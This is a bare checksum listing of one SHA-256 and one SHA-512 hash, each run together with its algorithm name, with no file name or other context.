SHA25614699e2fdc3cd74cb0febf72b1e30df380b16900d35080bc54f6fdf882719c09
SHA512a57f04d7dd196bba1b4f5b0460e86fd0f2b128b8ee3fd74ab78e06244212bb292c66e5f1ee413271f212c6424b080eb5fb8af1d98e02fc426ce1a3f66ac86049